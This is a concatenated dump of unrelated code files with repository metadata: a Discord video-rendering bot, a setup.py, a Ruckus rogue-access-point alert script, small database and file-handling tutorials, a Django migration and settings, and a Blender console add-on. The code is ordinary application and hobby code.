    Enforces per-guild (5) and per-user (3) pending-job limits, fetches the
    requested history (optionally anchored at a replied-to message), converts
    it to court comments and appends a Render job for the background worker.
    Errors are reported by editing the feedback message.
    """
    global renderQueue
    petitionsFromSameGuild = [x for x in renderQueue if x.context.guild.id == context.guild.id]
    # BUGFIX: commands.Context has no '.user' attribute — the invoker is
    # exposed as '.author', so the old per-user check raised AttributeError.
    petitionsFromSameUser = [x for x in renderQueue if x.context.author.id == context.author.id]
    if (len(petitionsFromSameGuild) > 5):
        raise Exception("Only up to five renders per guild are allowed")
    if (len(petitionsFromSameUser) > 3):
        raise Exception("Only up to three renders per user are allowed")
    feedbackMessage = await context.send(content="`Fetching messages...`")
    try:
        if not (numberOfMessages in range(1, 151)):
            raise Exception("Number of messages must be between 1 and 150")
        # baseMessage is the message from which the specified number of messages
        # will be fetched (not including itself); a reply anchors it explicitly.
        baseMessage = context.message.reference.resolved if context.message.reference else context.message
        courtMessages = []
        discordMessages = []
        # When invoked as a reply, the replied-to message itself counts toward
        # the requested total, so include it and fetch one fewer from history.
        if not baseMessage.id == context.message.id:
            numberOfMessages = numberOfMessages - 1
            discordMessages.append(baseMessage)
        # Fetch newest-first history ending just before the anchor message.
        discordMessages += await context.channel.history(limit=numberOfMessages, oldest_first=False, before=baseMessage).flatten()
        # Convert to court comments, oldest first (hence insert at index 0),
        # skipping messages with no usable text.
        for discordMessage in discordMessages:
            message = Message(discordMessage)
            if message.text.strip():
                courtMessages.insert(0, message.to_Comment())
        if len(courtMessages) < 1:
            raise Exception("There should be at least one person in the conversation.")
        newRender = Render(State.QUEUED, context, feedbackMessage, courtMessages)
        renderQueue.append(newRender)
    except Exception as exception:
        exceptionEmbed = discord.Embed(description=str(exception), color=0xff0000)
        await feedbackMessage.edit(content="", embed=exceptionEmbed)
        addToDeletionQueue(feedbackMessage)
@tasks.loop(seconds=1)
async def deletionQueueLoop():
    """Tick every pending deletion once per second and drop finished entries."""
    global deletionQueue
    deletionQueueSize = len(deletionQueue)
    # Delete message and remove from queue if remaining time is less than (or equal to) 0
    if deletionQueueSize > 0:
        # Iterate backwards so pop(index) does not shift unvisited entries.
        for index in reversed(range(deletionQueueSize)):
            if await deletionQueue[index].update():
                deletionQueue.pop(index)
@tasks.loop(seconds=5)
async def renderQueueLoop():
    """Drive each queued Render job through its feedback/upload state machine.

    The actual video rendering happens in renderThread; this loop only
    updates user-facing feedback, uploads finished videos (to Discord, or to
    an external host when the file exceeds the guild's size limit), and
    removes completed jobs from the queue.
    """
    global renderQueue
    renderQueueSize = len(renderQueue)
    await changeActivity(f"{prefix}help | queue: {renderQueueSize}")
    for positionInQueue, render in enumerate(iterable=renderQueue, start=1):
        try:
            if render.getState() == State.QUEUED:
                newFeedback = f"""
                `Fetching messages... Done!`
                `Position in the queue: #{(positionInQueue)}`
                """
                await render.updateFeedback(newFeedback)
            if render.getState() == State.INPROGRESS:
                newFeedback = f"""
                `Fetching messages... Done!`
                `Your video is being generated...`
                """
                await render.updateFeedback(newFeedback)
            if render.getState() == State.FAILED:
                newFeedback = f"""
                `Fetching messages... Done!`
                `Your video is being generated... Failed!`
                """
                await render.updateFeedback(newFeedback)
                # DONE marks the job for cleanup in the finally block below.
                render.setState(State.DONE)
            if render.getState() == State.RENDERED:
                newFeedback = f"""
                `Fetching messages... Done!`
                `Your video is being generated... Done!`
                `Uploading file to Discord...`
                """
                await render.updateFeedback(newFeedback)
                render.setState(State.UPLOADING)
                # If the file size is lower than the maximun file size allowed in this guild, upload it to Discord
                fileSize = os.path.getsize(render.getOutputFilename())
                if fileSize < render.getContext().channel.guild.filesize_limit:
                    await render.getContext().send(content=render.getContext().author.mention, file=discord.File(render.getOutputFilename()))
                    render.setState(State.DONE)
                    newFeedback = f"""
                    `Fetching messages... Done!`
                    `Your video is being generated... Done!`
                    `Uploading file to Discord... Done!`
                    """
                    await render.updateFeedback(newFeedback)
                else:
                    # Too big for Discord: fall back to an external file host.
                    try:
                        newFeedback = f"""
                        `Fetching messages... Done!`
                        `Your video is being generated... Done!`
                        `Video file too big for you server! {round(fileSize/1000000, 2)} MB`
                        `Trying to upload file to an external server...`
                        """
                        await render.updateFeedback(newFeedback)
                        with open(render.getOutputFilename(), 'rb') as videoFile:
                            files = {'files[]': (render.getOutputFilename(), videoFile)}
                            response = requests.post('https://uguu.se/upload.php?output=text', files=files).content.decode("utf-8").strip()
                        newFeedback = f"""
                        `Fetching messages... Done!`
                        `Your video is being generated... Done!`
                        `Video file too big for you server! {round(fileSize/1000000, 2)} MB`
                        `Trying to upload file to an external server... Done!`
                        """
                        await render.updateFeedback(newFeedback)
                        await render.getContext().send(content=f"{render.getContext().author.mention}\n{response}\n_This video will be deleted in 48 hours_")
                        render.setState(State.DONE)
                    except Exception as exception:
                        newFeedback = f"""
                        `Fetching messages... Done!`
                        `Your video is being generated... Done!`
                        `Video file too big for you server! {round(fileSize/1000000, 2)} MB`
                        `Trying to upload file to an external server... Failed!`
                        """
                        await render.updateFeedback(newFeedback)
                        exceptionEmbed = discord.Embed(description=exception, color=0xff0000)
                        exceptionMessage = await render.getContext().send(embed=exceptionEmbed)
                        addToDeletionQueue(exceptionMessage)
                        render.setState(State.DONE)
        except Exception as exception:
            print(f"Error: {exception}")
            try:
                render.setState(State.DONE)
            except:
                pass
        finally:
            # Finished jobs get their temp files removed and feedback scheduled
            # for deletion before being dropped from the queue below.
            if render.getState() == State.DONE:
                clean(render.getMessages(), render.getOutputFilename())
                addToDeletionQueue(render.getFeedbackMessage())
    # Remove from queue if state is DONE
    if renderQueueSize > 0:
        for index in reversed(range(renderQueueSize)):
            if renderQueue[index].getState() == State.DONE:
                renderQueue.pop(index)
@courtBot.event
async def on_ready():
    """Log the login and start the background task loops once connected."""
    global currentActivityText
    print("Bot is ready!")
    print(f"Logged in as {courtBot.user.name}#{courtBot.user.discriminator} ({courtBot.user.id})")
    currentActivityText = f"{prefix}help"
    renderQueueLoop.start()
    deletionQueueLoop.start()
def clean(thread: List[Comment], filename):
    """Delete a rendered video and any per-comment evidence files.

    Args:
        thread: comments whose ``evidence_path`` attachments should be removed
            (entries with ``evidence_path`` set to None are skipped).
        filename: path of the rendered output video to remove.

    Errors are printed and swallowed so cleanup never breaks the caller.
    """
    try:
        os.remove(filename)
    except Exception as exception:
        print(f"Error: {exception}")
    try:
        for comment in thread:
            if (comment.evidence_path is not None):
                # BUGFIX: was 'comment.evidente_path' (typo) — it raised
                # AttributeError, so evidence files were never deleted.
                os.remove(comment.evidence_path)
    except Exception as exception:
        print(f"Error: {exception}")
def renderThread():
    """Background worker: render the first QUEUED job, then rescan the queue."""
    global renderQueue
    while True:
        time.sleep(2)
        try:
            for render in renderQueue:
                if render.getState() == State.QUEUED:
                    render.setState(State.INPROGRESS)
                    try:
                        # Blocking video generation; state tells the async
                        # loops how to report the outcome.
                        render_comment_list(render.getMessages(), render.getOutputFilename())
                        render.setState(State.RENDERED)
                    except Exception as exception:
                        print(f"Error: {exception}")
                        render.setState(State.FAILED)
                    finally:
                        # Restart the scan: the queue may have changed while rendering.
                        break
        except Exception as exception:
            print(f"Error: {exception}")
backgroundThread = threading.Thread(target=renderThread, name="RenderThread")
backgroundThread.start()
# Blocks until the bot disconnects.
courtBot.run(token)
# NOTE(review): renderThread loops forever, so this join never returns —
# confirm whether a daemon thread or a stop flag was intended.
backgroundThread.join()
| [
"manncodes@gmail.com"
] | manncodes@gmail.com |
91dcf081ba91231f27d967ba1acc3391a6f0db0c | e84b4eeb10a568a6a2e6283b86444358c49b6fbf | /setup.py | 8fa0a35b13068fe79fe6d06441983cb07399dc61 | [
"MIT"
] | permissive | jeffypooo/agent-finder | e002b39b513755ebf28a5f19a8581a8b237ec37f | 103f41f5c77bd9b4f5c42aed805442fad88e5f7f | refs/heads/master | 2022-09-13T09:25:43.156024 | 2019-11-14T22:02:42 | 2019-11-14T22:02:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | import setuptools
# The README doubles as the PyPI long description.
with open("README.md", "r") as fh:
    long_description = fh.read()
setuptools.setup(
    name="agent-finder-masterjefferson",
    version="0.2",
    author="Jefferson Jones",
    author_email="jeffersonmjones92@gmail.com",
    description="Find nearby auto insurance agents and dump them to a CSV file.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/masterjefferson/agent-finder",
    packages=setuptools.find_packages(),
    # Console script entry point: `agent-finder` runs finder.finder:main.
    entry_points={
        'console_scripts': [
            'agent-finder = finder.finder:main'
        ]
    },
    install_requires=[
        'googlemaps'
    ],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: MacOS",
    ],
    python_requires='>=3.7.5',
)
| [
"jeff@beartooth.com"
] | jeff@beartooth.com |
834b1d7e8be891e345f7c11b0a22ff8a44e36725 | 039e3eb784605c3c4cc69027f236287671ed2cc8 | /rogue_device/rogue_device.py | 5b8dd976c62b00a79054421520d4b6660a6a38d2 | [] | no_license | WirelessProject/ruckuscli | 52c195898339948cba20693fb6e58c5bafb2580e | 6c39f0bd0f19cb9e2444e4d89d8015f05f96daa5 | refs/heads/master | 2021-09-11T13:45:00.139505 | 2018-04-08T06:28:32 | 2018-04-08T06:28:32 | 111,395,363 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,358 | py | #!/usr/bin/env python
import datetime
import pexpect
import getpass
import re
import smtplib
import time
from time import localtime, strftime
from termcolor import colored
# Credentials and state populated interactively in the __main__ block.
username = ''              # Gmail account used to send alerts
password = ''
fromaddr = ''
toaddrs = ''
rogue_device_detected = 0  # set when a scan finds a spoofed SSID
_time = 0                  # minutes between scan cycles
log_in_account = ''
log_in_password = '' # Password
def mailing(device):
    """Send a rogue-device alert email via Gmail SMTP.

    *device* is a dict with Mac/Channel/Radio/Type/Encryption/SSID/
    Last_Detected keys, as built by main().
    """
    server = smtplib.SMTP('smtp.gmail.com:587')
    server.ehlo()
    server.starttls()
    # NOTE(review): the From:/To: headers below are literal placeholders; the
    # actual envelope addresses come from fromaddr/toaddrs in sendmail().
    msg = "\r\n".join([
        "From: user_me@gmail.com",
        "To: user_you@gmail.com",
        "Subject: csie Rogue Device discovered !!!",
        "Mac = %s" % (device['Mac']),
        "Channel = %s" % (device['Channel']),
        "Radio = %s " %(device['Radio']),
        "Type = %s" % (device['Type']),
        "Encryption = %s" % (device['Encryption']),
        "SSID = %s" % (device['SSID']),
        "Last_Detected = %s" %(device['Last_Detected']),
    ])
    server.login(username,password)
    server.sendmail(fromaddr, toaddrs, msg)
    server.quit()
def main():
    """One scan cycle: SSH to the ZoneDirector, list valid SSIDs, and mail
    an alert for every rogue device spoofing one of them.

    NOTE(review): this connects to wifi.csie.ntu.edu.tw while the credential
    check in __main__ uses 10.3.7.253 — confirm both point at the same ZD.
    """
    p = pexpect.spawn('ssh wifi.csie.ntu.edu.tw')
    print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Login to ZD')
    p.expect('Please login:')
    p.sendline(log_in_account) # Usename
    p.sendline(log_in_password) # Password
    print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Login succeeded')
    p.expect('ruckus>')
    p.sendline('enable') # Enable mode
    # Only one privileged session is allowed at a time on the ZD.
    idx = p.expect(['ruckus#', 'A privileged user is already logged in.'])
    if idx != 0: # Someone already in.
        print(strftime("%Y-%m-%d %H:%M:%S", localtime()),
              'A privileged user is already logged in, try in the next cycle.')
        p.sendline('exit')
        p.close()
        return
    p.sendline('show wlan-group all')
    p.expect('ruckus#')
    data = p.before
    data = data.split('WLAN Service:')[1:]
    # get valid SSIDs
    valid_SSID = []
    for i in (data):
        tmp = re.findall('NAME= (\S+)\r\r\n', i)[0]
        if not tmp:
            continue
        valid_SSID.append(tmp)
    # this line is for testing
    # valid_SSID.append('NTU')
    p.sendline('show rogue-devices')
    p.expect('Current Active Rogue Devices:\r\r\n')
    p.expect('ruckus#')
    data = p.before
    # Parse each rogue-device record out of the CLI dump.
    entries = re.split('Rogue Devices:\r\r\n', data.decode('utf-8'))[1:]
    rogue_devices = []
    for entry in entries:
        #check for empty line
        if len(re.findall('Mac Address= (\S+)\r\r\n', entry)) == 0:
            continue
        Mac = re.findall('Mac Address= (\S+)\r\r\n', entry)[0]
        Channel = re.findall('Channel= (\S+)\r\r\n',entry)[0]
        Radio = re.findall('Radio= (\S+)\r\r\n',entry)[0]
        Type = re.findall('Type= (\S+)\r\r\n',entry)[0]
        Encryption = re.findall('Encryption= (\S+)\r\r\n',entry)[0]
        #check for empty SSID
        ###assume SSID is at most two segments seperated by spaces!!!!!
        if len(re.findall('SSID= (\S+)\r\r\n',entry)) != 0:
            if len(re.findall('SSID= (\S+ \S+)\r\r\n',entry)) == 0:
                SSID = re.findall('SSID= (\S+)\r\r\n',entry)[0]
            else:
                SSID = re.findall('SSID= (\S+ \S+)\r\r\n',entry)[0]
        else:
            SSID = []
        Last_Detected = re.findall('Last Detected= (\S+ \S+)\r\r\n',entry)[0]
        rogue_devices.append({
            'Mac' : Mac,
            'Channel': Channel,
            'Radio' : Radio,
            'Type' : Type,
            'Encryption' : Encryption,
            'SSID' : SSID,
            'Last_Detected' : Last_Detected,
        })
    # Alert on any rogue device advertising one of our own SSIDs.
    for device in rogue_devices:
        if device['SSID'] in valid_SSID :
            # NOTE(review): this assignment is local — without a 'global'
            # statement the module-level rogue_device_detected flag checked in
            # __main__ never changes; confirm whether that was intended.
            rogue_device_detected = 1
            print(colored(strftime("%Y-%m-%d %H:%M:%S", localtime()) + ' Rogue device detected, mailing','red',attrs = ['bold']))
            try:
                mailing(device)
            except smtplib.SMTPException:
                print(colored(strftime("%Y-%m-%d %H:%M:%S", localtime())+ ' Mailing failed !!!!!!','red',attrs = ['bold']))
    p.sendline('exit')
    p.close()
    print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Logout from ZD')
if __name__ == '__main__':
    # Interactive setup: scan interval, ZD credentials, Gmail credentials.
    _time = int(raw_input('Please Enter the interval(minute) between cycles: '))
    server = smtplib.SMTP('smtp.gmail.com:587')
    server.starttls()
    #get zd account
    # Verify the ZoneDirector credentials by attempting an SSH login.
    while True:
        try:
            log_in_account = raw_input('Please login: ') # username
            log_in_password = getpass.getpass('Password: ') # Password
            p = pexpect.spawn('ssh 10.3.7.253')
            p.expect('Please login:')
            p.sendline(log_in_account) # Usename
            p.sendline(log_in_password) # Password
            p.expect('ruckus>',timeout = 1)
            p.sendline('exit')
            p.close()
            break
        except pexpect.TIMEOUT:
            print("your username or password is incorrect, please try again")
    #get user gmail account,zd account
    while True:
        try:
            username = raw_input('Please Enter your Gmail Account: ')
            password = getpass.getpass('Password: ')
            server.login(username,password)
            break
        except smtplib.SMTPException:
            print("your username or password is incorrect, please try again")
            continue
    fromaddr = 'zone director';
    toaddrs = raw_input('Please Enter your Gmail toaddr: ')
    print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Start')
    #start scanning for rogue devices
    # Endless scan loop: one main() cycle, then sleep for the interval.
    while True:
        try:
            print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Start scanning for rogue devices')
            rogue_device_detected = 0
            main()
        except pexpect.TIMEOUT:
            print(strftime("%Y-%m-%d %H:%M:%S", localtime()),'Timeout.')
        time.sleep(60*_time)
        # NOTE(review): main() never sets the module-level flag (it assigns a
        # local), so this branch always reports "no rogue device" — verify.
        if rogue_device_detected == 0:
            print(strftime("%Y-%m-%d %H:%M:%S", localtime()),'Finish scanning, no rogue device detected')
        else:
            print(colored(strftime("%Y-%m-%d %H:%M:%S", localtime())+' Finish scanning, some rogue devices detected!!!','red',attrs = ['bold']))
    # Unreachable: the while loop above never exits.
    server.quit()
    print(datetime.datetime.now().isoformat(), 'End')
| [
"y60091534@gmail.com"
] | y60091534@gmail.com |
b536f3f4b4dacb8735de899950a24df3f163176b | bfbef414923883abc522dc064feafb730ce3b34c | /advance_python_obj_and_data_structure/file_handle_exception.py | c6ec45c8ea460faa74be32c04b67d8b657295d49 | [
"MIT"
] | permissive | alok-kumar8765/basic_python_practicse | ad5168fa3e8bcf4380d3f395d3dd76cb8d3faff5 | 9bd61f0b03fc1e703a75df39862a24692bb3fdb7 | refs/heads/main | 2023-07-26T01:46:36.168099 | 2021-09-03T06:10:40 | 2021-09-03T06:10:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | '''
p=open('oops.txt','a')
p.readlines()
p.close()
#let modify file
p.write('add more text')
p.close()
'''
#protect file with try/except/finally
import io
p = open('oops.txt', 'a')
try:
    # 'a' opens the file write-only, so reading raises io.UnsupportedOperation
    p.readlines()
except io.UnsupportedOperation:
    print('an exception raised')
finally:
    # finally always runs, so the handle is closed even after the exception
    p.close()
# BUGFIX: p was closed in finally above — writing to a closed file raises
# ValueError. Reopen before writing.
with open('oops.txt', 'a') as p:
    p.write('add more text')
# save step with with: 'a+' permits reading as well as appending, so the
# readlines() call no longer raises inside the with-block.
with open('oops.txt', 'a+') as p:
    p.seek(0)  # 'a+' starts positioned at EOF; rewind before reading
    p.readlines()
    p.write('add more text')
"85283226+alok-techqware@users.noreply.github.com"
] | 85283226+alok-techqware@users.noreply.github.com |
6a1d90a4e97b59248f282e363faf44e729a3aa2c | 4cb06a6674d1dca463d5d9a5f471655d9b38c0a1 | /rad416/Assignment4/tutorial3.py | 2ebb5beab5697193697389f89172bd983812751d | [] | no_license | nyucusp/gx5003-fall2013 | 1fb98e603d27495704503954f06a800b90303b4b | b7c1e2ddb7540a995037db06ce7273bff30a56cd | refs/heads/master | 2021-01-23T07:03:52.834758 | 2013-12-26T23:52:55 | 2013-12-26T23:52:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | import MySQLdb
#connect to database
# Python 2 / MySQLdb demo: connect, run one query, print each row, close.
db = MySQLdb.connect(host="localhost", # your host, usually localhost
                     user="rad416", # your username
                     passwd="mysql", # your password
                     db="coursedb") # name of the data base
# The Cursor object will let you execute the sql commands
cur = db.cursor()
# query all rows were age < 25
query = "SELECT * FROM test WHERE age < 25"
cur.execute(query)
#process the result
# Rows come back as tuples; columns are assumed to be (id, name, age).
for row in cur.fetchall():
    print str(row[0]) + " " + row[1] + " " + str(row[2])
#close connection
db.close()
"richarddunks@gmail.com"
] | richarddunks@gmail.com |
8f87de5431b19e473791bd915dbfe6c442403abc | 8b38873dc0236be98a258e984e1722a9f00ece5f | /MIS 2100/atomcust/game_stats.py | a970dd5f9331778299c4648d56c4d915537cab35 | [] | no_license | danrludwig/MIS-2100 | 123557df38537c2750749e86bc3eed1142d0c5f2 | a653eb24e4bada5d7356159d4f84f6eb37447b0e | refs/heads/master | 2020-05-04T17:40:55.303909 | 2019-04-04T20:58:42 | 2019-04-04T20:58:42 | 179,321,895 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | import psycopg2
# Connect to a local PostgreSQL database and create the 'phone' table.
# NOTE(review): credentials are hard-coded in source — move them to
# environment variables or a config file before sharing/deploying.
try:
    connection = psycopg2.connect(user = 'postgres',
                                  password = 'oysome!1',
                                  host = 'localhost',
                                  port = '5432',
                                  database = 'boys_basketball'
                                  )
    cursor = connection.cursor()
    create_table_query = """ CREATE TABLE phone
          (ID INT PRIMARY KEY     NOT NULL,
          MODEL           TEXT    NOT NULL,
          PRICE           REAL);"""
    cursor.execute(create_table_query)
    # DDL still needs an explicit commit under psycopg2's default mode.
    connection.commit()
    print('Table created sucessfully in PostgreSQL')
    cursor.close()
    connection.close()
except (Exception, psycopg2.Error) as error:
    print('Error while connecting to PostgreSQL', error)
| [
"noreply@github.com"
] | noreply@github.com |
531852ea327771f1089a88d011fac0d74d818f24 | 49eaf0ccabb65b02da367764f9d5a3748ecddaf4 | /03-rank.py | 3d725273d96065f5be1768a62f909c7f1f69c5e4 | [] | no_license | asharifara/tensorflow-examples | 4ae8b037e4a5a13bec49bdb977d0338ce22be1e7 | 3babf63896dd954bd2925535bb4efa9dcd749533 | refs/heads/master | 2022-04-01T19:04:29.288983 | 2019-12-20T03:17:21 | 2019-12-20T03:17:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | import tensorflow as tf
# TensorFlow 1.x demo: tf.rank() returns the number of dimensions of a tensor.
session = tf.Session()
zeroD = tf.constant(4)                      # scalar -> rank 0
oneD = tf.constant(['ali', 'sharifara'])    # vector -> rank 1
twoD = tf.constant([[1.0, 2.9], [3.7, 4.4]])  # matrix -> rank 2
threeD = tf.constant([[[1.0, 2.9], [3.7, 2.4]], [[3.7, 2.4], [3.7, 2.4]]])  # rank 3
print(session.run(tf.rank(zeroD)))
print(session.run(tf.rank(oneD)))
print(session.run(tf.rank(twoD)))
print(session.run(tf.rank(threeD)))
session.close()
| [
"noreply@github.com"
] | noreply@github.com |
7023ccfa04ae9db5e41aa1991b5c1bdc4d513f2a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02948/s243741324.py | 2cffaa3be99d436febcc3c638d3fc41cc448b571 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | from heapq import heappop,heappush,heapify
from collections import deque
# Competitive-programming solution: N jobs, each available A days after start
# with reward B; pick at most one job per remaining day within M days and
# maximize total reward (greedy with a max-heap of rewards).
N,M=map(int,input().split())
A,B,C = [0]*N,[0]*N,[0]*N
for i in range(N):
    A[i],B[i] = map(int,input().split())
    C[i]=[A[i],B[i]]
# Sort jobs by lead time so they can be released in order as days pass.
C.sort()
C=deque(C)
a=[]
heapify(a)
ans=0
# i counts down so M-i is the number of days already elapsed.
for i in range(M,-1,-1):
    while C:
        if C[0][0]<=M-i:
            # Negate rewards: heapq is a min-heap, we need the max reward.
            heappush(a,(-1)*C[0][1])
            C.popleft()
        else:
            break
    if len(a)>0:
        p = heappop(a)
        ans += (-1)*p
print(ans)
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7ae77f3fc583e7b1cab76db09ec2b17e3baa6bc8 | 9fc69e503a4980efe2f47fb0416f2f414e95cde6 | /theatre/shows/migrations/0010_auto_20150204_2008.py | 1814bc2517dcbfe59b4c83a807780ca589d60f82 | [] | no_license | mkgilbert/cs399_the_theatre | a5f05a5e95fc2b67fb74047c0adc3e5c92d43a68 | a775065be3eaef5ed49e7007ac20f7bfbc7e0a1e | refs/heads/master | 2016-09-05T09:09:22.385254 | 2015-02-06T02:09:13 | 2015-02-06T02:09:13 | 29,870,404 | 1 | 0 | null | 2015-02-03T06:13:22 | 2015-01-26T16:38:27 | Python | UTF-8 | Python | false | false | 587 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def delete_some_tickets(apps, schema_editor):
    # Data migration: drop every ticket whose seat sits beyond row 15.
    # The historical model is fetched via apps so the migration stays valid
    # even if the current Show model has changed.
    Show = apps.get_model("shows", "Show")
    shows = Show.objects.all()
    for show in shows:
        tickets = show.tickets.all()
        for ticket in tickets:
            if ticket.seat.row > 15:
                ticket.delete()
class Migration(migrations.Migration):
    dependencies = [
        ('shows', '0009_auto_20150204_1906'),
    ]
    # NOTE(review): no reverse function is provided, so this migration is
    # irreversible (deleted tickets cannot be restored).
    operations = [
        migrations.RunPython(delete_some_tickets)
    ]
| [
"justin.poehnelt@gmail.com"
] | justin.poehnelt@gmail.com |
b84dd9230ccb462252288d436554e4655ed6d463 | 58a82d4b72e8c83d8c93a3d3639aa65fbdc9fcbd | /BCPrompt/bc_operators.py | a9acc39d4ec5b58e487e2b05b20c2289164e5737 | [] | no_license | 8Observer8/myblendercontrib | 4de9b880da56a909b3da19c732e32557ab48400b | 71aa26457c50622cf5646a7aa39fbe11491f3e7b | refs/heads/master | 2021-01-15T15:33:13.133667 | 2015-10-14T15:38:48 | 2015-10-14T15:38:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,961 | py | import bpy
from console_python import add_scrollback
from .bc_command_dispatch import (
in_scene_commands,
in_search_commands,
in_sverchok_commands,
in_core_dev_commands,
in_modeling_tools,
in_upgrade_commands,
in_bpm_commands,
in_fast_ops_commands)
history_append = bpy.ops.console.history_append
addon_enable = bpy.ops.wm.addon_enable
def print_most_useful():
    # Write the command cheat-sheet into the Blender console scrollback.
    # The table below is user-facing output — keep its alignment intact.
    content = '''\
for full verbose descriptor use -man
command    | description
-----------+----------------
tt | tb    | turntable / trackball nav.
cen        | centers 3d cursor
cenv       | centers 3d cursor, aligns views to it
cento      | centers to selected
endswith!  | copy current console line if ends with exclm.
x?bpy      | search blender python for x
x?bs       | search blenderscripting.blogspot for x
x?py       | search python docs for x
x?se       | search B3D StackExchange
x??se      | regular StackExchange search
vtx, xl    | enable or trigger tinyCAD vtx (will download)
ico        | enables icon addon in texteditor panel (Dev)
123        | use 1 2 3 to select vert, edge, face
-img2p     | enabled image to plane import addon
-or2s      | origin to selected.
-dist      | gives local distance between two selected verts
-gist -o x | uploads all open text views as x to anon gist.
-debug     | dl + enable extended mesh index visualiser. it's awesome.
-----------+----------------------------------------------------------
-idxv      | enable by shortcut name (user defined)
enable <named addon>  | package name or folder name
v2rdim     | sets render dimensions to current strip.
fc         | fcurrent -> end.frame
'''
    add_scrollback(content, 'OUTPUT')
class TextSyncOps(bpy.types.Operator):
    """Reload the active text block from disk, discarding in-editor changes."""
    bl_idname = "text.text_upsync"
    bl_label = "Upsyncs Text from disk changes"
    def execute(self, context):
        # 'RELOAD' resolves the editor/disk conflict in favour of the disk copy.
        text_block = context.edit_text
        bpy.ops.text.resolve_conflict(resolution='RELOAD')
        return{'FINISHED'}
class ConsoleDoAction(bpy.types.Operator):
    """Dispatch the last console line through the bc command handlers."""
    bl_label = "ConsoleDoAction"
    bl_idname = "console.do_action"
    def execute(self, context):
        # The command is whatever the user last typed into the console.
        m = bpy.context.space_data.history[-1].body
        m = m.strip()
        DONE = {'FINISHED'}
        # Try every dispatch group in turn; each returns truthy when it
        # recognised and handled the command.
        if any([
            in_scene_commands(context, m),
            in_search_commands(context, m),
            in_sverchok_commands(context, m),
            in_core_dev_commands(context, m),
            in_modeling_tools(context, m),
            in_upgrade_commands(context, m),
            in_bpm_commands(context, m),
            in_fast_ops_commands(context, m)
        ]):
            return DONE
        elif m == '-ls':
            print_most_useful()
            return DONE
        elif m == 'cl':
            bpy.ops.console.clear()
            return DONE
        # Unrecognised input falls through as handled so the console stays usable.
        return {'FINISHED'}
def register():
    # Register every class in this module with Blender.
    # NOTE(review): register_module/unregister_module were removed in
    # Blender 2.8 — confirm the targeted Blender version.
    bpy.utils.register_module(__name__)
def unregister():
    # Mirror of register(): remove this module's classes from Blender.
    bpy.utils.unregister_module(__name__)
| [
"Develop@Shaneware.Biz"
] | Develop@Shaneware.Biz |
91c53302d52e9d5a99a4e0d0b685179371931b6d | cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45 | /Personal/Jaypur/Jaypur/settings.py | 76bd9d7c357d60980068b2b15d2475f763bef64f | [] | no_license | ProsenjitKumar/PycharmProjects | d90d0e7c2f4adc84e861c12a3fcb9174f15cde17 | 285692394581441ce7b706afa3b7af9e995f1c55 | refs/heads/master | 2022-12-13T01:09:55.408985 | 2019-05-08T02:21:47 | 2019-05-08T02:21:47 | 181,052,978 | 1 | 1 | null | 2022-12-08T02:31:17 | 2019-04-12T17:21:59 | null | UTF-8 | Python | false | false | 3,158 | py | """
Django settings for Jaypur project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control — rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = '_c4#s_+@o6kx5@ej$9+n-1)-_1+0rqscbzrd()25q=f@=e7m34'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty list is only valid while DEBUG is True; production needs real hosts.
ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Project-local app, registered via its AppConfig.
    'app.apps.AppConfig',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'Jaypur.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level template directory in addition to per-app templates.
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'Jaypur.wsgi.application'

# Database
